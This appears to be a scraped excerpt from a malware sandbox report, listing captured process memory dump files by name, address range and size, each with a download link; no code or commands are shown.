memory/5884-3248-0x0000000005850000-0x0000000005BA4000-memory.dmp

Filesize
3.3MB

Download
memory/5884-2926-0x0000000002830000-0x0000000002866000-memory.dmp

Filesize
216KB

Download
memory/5884-3051-0x0000000004D50000-0x0000000004D72000-memory.dmp

Filesize
136KB

Download
memory/5956-1608-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/6240-2184-0x0000000000010000-0x0000000000016D80-memory.dmp

Filesize
27KB

Download
memory/6348-2996-0x000001E2FA740000-0x000001E2FA750000-memory.dmp

Filesize
64KB

Download
memory/6348-2397-0x000001E2FA950000-0x000001E2FA972000-memory.dmp

Filesize
136KB

Download
memory/6480-2026-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/6536-3146-0x0000000002070000-0x000000000208B000-memory.dmp

Filesize
108KB

Download
memory/6536-3145-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/6604-2248-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/6716-2644-0x0000000000400000-0x00000000004E5000-memory.dmp

Filesize
916KB

Download
memory/6720-1908-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/6888-2909-0x0000000073060000-0x0000000073611000-memory.dmp

Filesize
5.7MB

Download
memory/6888-2183-0x0000000000F20000-0x0000000000F30000-memory.dmp

Filesize
64KB

Download